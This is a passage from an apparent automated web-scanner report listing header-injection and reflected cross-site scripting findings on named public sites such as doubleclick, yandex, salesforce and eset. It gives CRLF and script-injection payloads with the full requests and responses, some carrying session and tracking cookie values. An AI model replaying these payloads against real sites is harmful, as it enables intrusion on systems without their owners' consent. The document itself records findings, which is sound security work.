Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/69b58
fb4aa952766/lj.homepage/loggedout;a=1;r=0;w=0;c=se;pt=se;vert=_code;sz=728x90;pos=t;tile=1;ord=2623414837:
Date: Mon, 25 Apr 2011 14:33:59 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

5.2. http://ad.doubleclick.net/dot.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d65f3%0d%0ab88a010799e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gifd65f3%0d%0ab88a010799e?1303741320269 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gifd65f3
b88a010799e:
Date: Mon, 25 Apr 2011 14:56:32 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

5.3. http://bs.yandex.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.yandex.ru
Path:	/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload c396e%0d%0ac1277611b7a was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ruc396e%0d%0ac1277611b7a?67253133 HTTP/1.1
Host: bs.yandex.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 14:34:43 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:34:43 GMT
Expires: Mon, 25 Apr 2011 14:34:43 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Location: http://bs.mail.ruc396e
c1277611b7a/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ruc396e
c1277611b7a,1981869761303741204?67253133
Content-Length: 0

5.4. http://click-here-to-listen.com/players/iaPlay13.swf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://click-here-to-listen.com
Path:	/players/iaPlay13.swf

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload baa49%0d%0ab09bbe6f887 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /baa49%0d%0ab09bbe6f887/iaPlay13.swf?x=2108535237WCZSIT HTTP/1.1
Host: click-here-to-listen.com
Proxy-Connection: keep-alive
Referer: http://playaudiomessage.com/play.asp?m=535237&f=WCZSIT&ps=13&c=FFFFFF&pm=2&h=25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved
Location: http://sfo.click-here-to-listen.com/baa49
b09bbe6f887/iaPlay13.swf
Connection: close

5.5. http://click-here-to-listen.com/players/iaPlay13.swf [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://click-here-to-listen.com
Path:	/players/iaPlay13.swf

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload fdaa7%0d%0aa82a400e71b was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /players/fdaa7%0d%0aa82a400e71b?x=2108535237WCZSIT HTTP/1.1
Host: click-here-to-listen.com
Proxy-Connection: keep-alive
Referer: http://playaudiomessage.com/play.asp?m=535237&f=WCZSIT&ps=13&c=FFFFFF&pm=2&h=25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved
Location: http://sfo.click-here-to-listen.com/players/fdaa7
a82a400e71b
Connection: close

5.6. http://pretty.ru/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pretty.ru
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9656f%0d%0a539e8d0607b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9656f%0d%0a539e8d0607b HTTP/1.1
Host: pretty.ru
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: domhit=1; randomhit=177203261; LP_CH_C=love_cookies; __utmz=1.1303741245.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.850278810.1303741245.1303741245.1303741245.1; __utmc=1; __utmb=1.1.10.1303741245

Response

HTTP/1.1 302 Found
Server: nginx
Date: Mon, 25 Apr 2011 14:56:13 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Location: /a-main/param-notfound/login-9656f
539e8d0607b:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 25 Apr 2011 14:56:13 GMT
Content-Length: 100

5.7. http://www.instantengage.com/operator_status.php [on parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.instantengage.com
Path:	/operator_status.php

Issue detail

The value of the on request parameter is copied into the location response header. The payload 1225d%0d%0a6b625487c7a was submitted in the on parameter. This caused a response containing an injected HTTP header.

Request

GET /operator_status.php?acctid=1756&on=1225d%0d%0a6b625487c7a&off=http%3A%2F%2Fwww.instantengage.com%2Fimages_store%2Fset6_2.gif&unique=2011325105357 HTTP/1.1
Host: www.instantengage.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 15:46:07 GMT
Server: Apache/2.0.50 (Fedora)
X-Powered-By: PHP/4.3.8
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
location: 1225d
6b625487c7a
P3P: CP="OTI DSP COR PSAa OUR IND COM NAV STA"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

5.8. https://www.salesforce.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.salesforce.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5719e%0d%0aad6007fb0ac was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5719e%0d%0aad6007fb0ac HTTP/1.1
Host: www.salesforce.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%2C%22bar-expanded%22%3Atrue%7D; s_pers=%20v44%3DExternal%2520Websites%7C3233921094723%3B%20v30%3DExternal%2520Websites%257Cburp%7C3233921094725%3B; s_vi=[CS]v1|26D8CEE5051D3246-60000107A001D614[CE]

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /5719e
ad6007fb0ac/
Date: Mon, 25 Apr 2011 16:09:37 GMT
Content-Length: 77

The URL has moved to <a href="/5719e
ad6007fb0ac/">/5719e
ad6007fb0ac/</a>

5.9. https://www.salesforce.com/servlet/servlet.WebToLead [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.salesforce.com
Path:	/servlet/servlet.WebToLead

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 5adda%0d%0a7266c97a38c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

POST /servlet/5adda%0d%0a7266c97a38c?encoding=UTF-8 HTTP/1.1
Host: www.salesforce.com
Connection: keep-alive
Referer: http://www.reputationchanger.com/
Cache-Control: max-age=0
Origin: http://www.reputationchanger.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%2C%22bar-expanded%22%3Atrue%7D; s_pers=%20v44%3DExternal%2520Websites%7C3233921094723%3B%20v30%3DExternal%2520Websites%257Cburp%7C3233921094725%3B; s_vi=[CS]v1|26D8CEE5051D3246-60000107A001D614[CE]
Content-Length: 198

oid=00DC0000000Piy3&retURL=http%3A%2F%2Fwww.reputationchanger.com%2Fscheduled.html&lead_source=Website&first_name=2&last_name=2&email=2&phone=2333333333&description=2&imageField.x=75&imageField.y=45

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /servlet/5adda
7266c97a38c/?encoding=UTF-8
Date: Mon, 25 Apr 2011 16:08:43 GMT
Content-Length: 123

The URL has moved to <a href="/servlet/5adda
7266c97a38c/?encoding=UTF-8">/servlet/5adda
7266c97a38c/?encoding=UTF-8</a>

6. Cross-site scripting (reflected) previous next
There are 91 instances of this issue:

http://ads.adxpose.com/ads/ads.js [uid parameter]
http://an.yandex.ru/code/47934 [target-ref parameter]
http://an.yandex.ru/code/57617 [target-ref parameter]
http://an.yandex.ru/code/66894 [target-ref parameter]
http://ar.voicefive.com/b/rc.pli [func parameter]
https://checkout.netsuite.com/core/ [name of an arbitrarily supplied request parameter]
https://checkout.netsuite.com/core/ [name of an arbitrarily supplied request parameter]
https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f [REST URL parameter 2]
https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f [REST URL parameter 3]
https://customer.kronos.com/default.asp [rurl parameter]
http://demr.opt.fimserve.com/adopt/ [sz parameter]
http://desk.opt.fimserve.com/adopt/ [sz parameter]
http://ds.addthis.com/red/psi/sites/www.kronos.com/p.json [callback parameter]
http://event.adxpose.com/event.flow [uid parameter]
https://hourly.deploy.com/hmc/report/ ['"--></style></script><script>netsparker(0x000054)</script> parameter]
https://hourly.deploy.com/hmc/report/ [name of an arbitrarily supplied request parameter]
https://hourly.deploy.com/hmc/report/ [nsextt parameter]
https://hourly.deploy.com/hmc/report/ [register parameter]
https://hourly.deploy.com/hmc/report/index.cfm ['"--></style></script><script>netsparker(0x00004F)</script> parameter]
https://hourly.deploy.com/hmc/report/index.cfm [j_username parameter]
https://hourly.deploy.com/hmc/report/index.cfm [j_username parameter]
https://hourly.deploy.com/hmc/report/index.cfm [name of an arbitrarily supplied request parameter]
https://hourly.deploy.com/hmc/report/index.cfm [nsextt parameter]
https://hourly.deploy.com/hmc/report/index.cfm [register parameter]
https://hourly.deploy.com/hmc/report/index.cfm/%22ns=%22netsparker(0x000042) [name of an arbitrarily supplied request parameter]
https://hourly.deploy.com/hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529) [name of an arbitrarily supplied request parameter]
http://ib.adnxs.com/ab [cnd parameter]
http://kronos.tt.omtrdc.net/m2/kronos/mbox/standard [mbox parameter]
http://kroogy.com/favicon.ico [REST URL parameter 1]
http://learn.shavlik.com/shavlik/index.cfm [h parameter]
http://learn.shavlik.com/shavlik/index.cfm [m parameter]
http://mbox5.offermatica.com/m2/netsuite/mbox/standard [mbox parameter]
http://mbox9e.offermatica.com/m2/eset/mbox/standard [mbox parameter]
http://ok.mail.ru/cookie-token.do [client_id parameter]
http://ok.mail.ru/cookie-token.do [remove parameter]
http://pixel.fetchback.com/serve/fb/pdc [name parameter]
http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil [height parameter]
http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil [width parameter]
http://playaudiomessage.com/play.asp [f parameter]
https://secure.trust-guard.com/ResetPassword.php [txtEmail parameter]
http://shopping.netsuite.com/s.nl [alias parameter]
http://shopping.netsuite.com/s.nl [name of an arbitrarily supplied request parameter]
http://shopping.netsuite.com/s.nl [name of an arbitrarily supplied request parameter]
http://shopping.netsuite.com/s.nl/c.438708/n.1/sc.3/.f [REST URL parameter 2]
http://shopping.netsuite.com/s.nl/c.438708/n.1/sc.3/.f [name of an arbitrarily supplied request parameter]
http://tools.manageengine.com/forums/security-manager/forum.php [char parameter]
http://widgets.digg.com/buttons/count [url parameter]
https://www.controlscan.com/save_order.php [company parameter]
https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [_IG_CALLBACK parameter]
https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [__EVENTVALIDATION parameter]
https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [name of an arbitrarily supplied request parameter]
http://www.google.com/search [tch parameter]
http://www.instantengage.com/open_chat.php [Email_To parameter]
http://www.instantengage.com/open_chat.php [Page_ID parameter]
http://www.integritydefender.com/buyerDetails.php [amount parameter]
http://www.integritydefender.com/buyerDetails.php [amount parameter]
http://www.integritydefender.com/buyerDetails.php [buyerId parameter]
http://www.integritydefender.com/buyerDetails.php [item_name parameter]
http://www.integritydefender.com/buyerDetails.php [item_name parameter]
https://www.salesforce.com/servlet/servlet.WebToLead [retURL parameter]
https://www.salesforce.com/servlet/servlet.WebToLead [retURL parameter]
http://www.stillsecure.com/m/ [comments parameter]
http://www.stillsecure.com/m/ [company parameter]
http://www.stillsecure.com/m/ [email parameter]
http://www.stillsecure.com/m/ [firstName parameter]
http://www.stillsecure.com/m/ [lastName parameter]
http://www.stillsecure.com/m/ [phone parameter]
http://www.trust-guard.com/Other/ImageResizer.php [src parameter]
https://hourly.deploy.com/hmc/report/Netsparkercdbd6412ae00461e9f79a262b2aa7b0f.cfm [User-Agent HTTP header]
http://www.dmca.com/Protection/Status.aspx [Referer HTTP header]
http://www.eset.com/business/server-security/linux-file [Referer HTTP header]
http://www.eset.com/us [Referer HTTP header]
http://www.eset.com/us/ [Referer HTTP header]
http://www.eset.com/us/business/products [Referer HTTP header]
http://www.eset.com/us/business/server-security/linux-file [Referer HTTP header]
http://www.eset.com/us/home/smart-security [Referer HTTP header]
http://www.eset.com/us/store [Referer HTTP header]
http://www.eset.com/us/styles/store-new.css [Referer HTTP header]
http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/ [Referer HTTP header]
http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]
http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]
http://ar.voicefive.com/bmx3/broker.pli [UID cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]
http://forums.manageengine.com/fbw [zdccn cookie]
http://forums.manageengine.com/fbw [zdccn cookie]
https://support.trust-guard.com/index.php [SWIFT_loginemail cookie]
https://support.trust-guard.com/visitor/index.php [SWIFT_sessionid80 cookie]

6.1. http://ads.adxpose.com/ads/ads.js [uid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.adxpose.com
Path:	/ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 86c33<script>alert(1)</script>797754eeb was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_28966886c33<script>alert(1)</script>797754eeb HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A16F926F5AA4C8CAA4023FBBBAB7879A; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 14:23:18 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
_LOG_EVENT__("000_000_3",b,j,"",Math.round(Y.left)+","+Math.round(Y.top),O+","+I,C,l,m,v,S,c)}}t=p.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_ZC45X9Axu6NOUFfX_28966886c33<script>alert(1)</script>797754eeb".replace(/[^\w\d]/g,""),"ZC45X9Axu6NOUFfX_28966886c33<script>
...[SNIP]...

6.2. http://an.yandex.ru/code/47934 [target-ref parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://an.yandex.ru
Path:	/code/47934

Issue detail

The value of the target-ref request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload de788(a)f60c8b163e7 was submitted in the target-ref parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /code/47934?rnd=33486&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=de788(a)f60c8b163e7&grab=dNCh0YDQtdC00L3QuNC1INC4INGC0Y_QttC10LvRi9C1INCz0YDRg9C30L7QstC40LrQuCDQsiDRgNC10LPQuNC-0L3QtSDQktGB0Y8g0KDQvtGB0YHQuNGPIC0g0L7QsdGK0Y_QstC70LXQvdC40Y8g0L3QsCBUcnVja2xpc3QucnUKMdCe0LHRitGP0LLQu9C10L3QuNGPIMK7wqAg0KHRgNC10LTQvdC40LUg0Lgg0YLRj9C20LXQu9GL0LUg0LPRgNGD0LfQvtCy0LjQutC4IAoyCjPQn9GA0LXQvNC40YPQvC3QvtCx0YrRj9Cy0LvQtdC90LjRjyA= HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204; yabs-uvf=0000000000000000

Response

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 14:47:53 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:47:53 GMT
Expires: Mon, 25 Apr 2011 14:47:53 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=windows-1251
Content-Length: 67

6.3. http://an.yandex.ru/code/57617 [target-ref parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://an.yandex.ru
Path:	/code/57617

Issue detail

The value of the target-ref request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2ff26(a)615e8e384bf was submitted in the target-ref parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /code/57617?rnd=29605&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=2ff26(a)615e8e384bf&grab=dNCSINCw0LzQtdGA0LjQutCw0L3RgdC60L7QuSDQs9C70YPQsdC40L3QutC1INC90LDRiNC70Lgg0YDQtdC00YfQsNC50YjRg9GOINC40L3QutGD0L3QsNCx0YPQu9GD HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://webalta.ru/news.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 14:22:57 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:22:57 GMT
Expires: Mon, 25 Apr 2011 14:22:57 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=windows-1251
Content-Length: 67

6.4. http://an.yandex.ru/code/66894 [target-ref parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://an.yandex.ru
Path:	/code/66894

Issue detail

The value of the target-ref request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ad56b(a)20328a529f was submitted in the target-ref parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /code/66894?rnd=148599&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=ad56b(a)20328a529f&grab=dNCf0L7Qs9C-0LTQsCDQvdCwIHdlYmFsdGEucnU= HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://pogoda.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204; yabs-uvf=0000000000000000

Response

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 14:24:47 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:24:47 GMT
Expires: Mon, 25 Apr 2011 14:24:47 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=windows-1251
Content-Length: 66

6.5. http://ar.voicefive.com/b/rc.pli [func parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 97042<script>alert(1)</script>906f6279423 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction97042<script>alert(1)</script>906f6279423&n=ar_int_p97174789&1303741250889 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
